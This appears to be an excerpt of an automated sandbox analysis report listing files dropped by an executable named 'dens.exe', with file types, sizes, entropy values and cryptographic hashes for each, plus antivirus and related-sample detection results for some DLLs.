                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.697336881644685
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
                                                                                                                                                                                                                                            MD5:08AF516B9E451DB9845289801A21F1BC
                                                                                                                                                                                                                                            SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
                                                                                                                                                                                                                                            SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
                                                                                                                                                                                                                                            SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                            MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                            SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                            SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                            SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                            MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                            SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                            SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                            SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.702896917219035
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694311754777018
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
                                                                                                                                                                                                                                            MD5:61908250A5348CC047FF15260F730C2B
                                                                                                                                                                                                                                            SHA1:CBCF34156EAE25B328A926E21008598EE8D1CBDE
                                                                                                                                                                                                                                            SHA-256:8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
                                                                                                                                                                                                                                            SHA-512:BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.697336881644685
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
                                                                                                                                                                                                                                            MD5:08AF516B9E451DB9845289801A21F1BC
                                                                                                                                                                                                                                            SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
                                                                                                                                                                                                                                            SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
                                                                                                                                                                                                                                            SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695860210921229
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                                                                                                                                                                                                                            MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                                                                                                                                                                                                                            SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                                                                                                                                                                                                                            SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                                                                                                                                                                                                                            SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                            MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                            SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                            SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                            SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                            MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                            SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                            SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                            SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                            MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                            SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                            SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                            SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                            MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                            SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                            SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                            SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                            MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                            SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                            SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                            SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                            MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                            SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                            SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                            SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):114688
                                                                                                                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):119192
                                                                                                                                                                                                                                            Entropy (8bit):6.6016214745004635
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                                                                                                                                                            MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                                                                                                                                                            SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                                                                                                                                                            SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                                                                                                                                                            SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                            • Filename: client.exe, Detection: malicious
                                                                                                                                                                                                                                            • Filename: client.exe, Detection: malicious
                                                                                                                                                                                                                                            • Filename: Runtime.exe, Detection: malicious
                                                                                                                                                                                                                                            • Filename: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe, Detection: malicious
                                                                                                                                                                                                                                            • Filename: Built.exe, Detection: malicious
                                                                                                                                                                                                                                            • Filename: windows update.exe, Detection: malicious
                                                                                                                                                                                                                                            • Filename: w32e.exe, Detection: malicious
                                                                                                                                                                                                                                            • Filename: 3ORCHAMYoz.exe, Detection: malicious
                                                                                                                                                                                                                                            • Filename: yuki.exe, Detection: malicious
                                                                                                                                                                                                                                            • Filename: CIEfSpAIUS.exe, Detection: malicious
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):49528
                                                                                                                                                                                                                                            Entropy (8bit):6.662491747506177
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:wPIyGVrxmKqOnA4j3z6Su77A+i0QLxi9z9Rtii9zn+:fBr87uW1nA8QLx+zrti+zn+
                                                                                                                                                                                                                                            MD5:F8DFA78045620CF8A732E67D1B1EB53D
                                                                                                                                                                                                                                            SHA1:FF9A604D8C99405BFDBBF4295825D3FCBC792704
                                                                                                                                                                                                                                            SHA-256:A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
                                                                                                                                                                                                                                            SHA-512:BA7F8B7AB0DEB7A7113124C28092B543E216CA08D1CF158D9F40A326FB69F4A2511A41A59EA8482A10C9EC4EC8AC69B70DFE9CA65E525097D93B819D498DA371
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
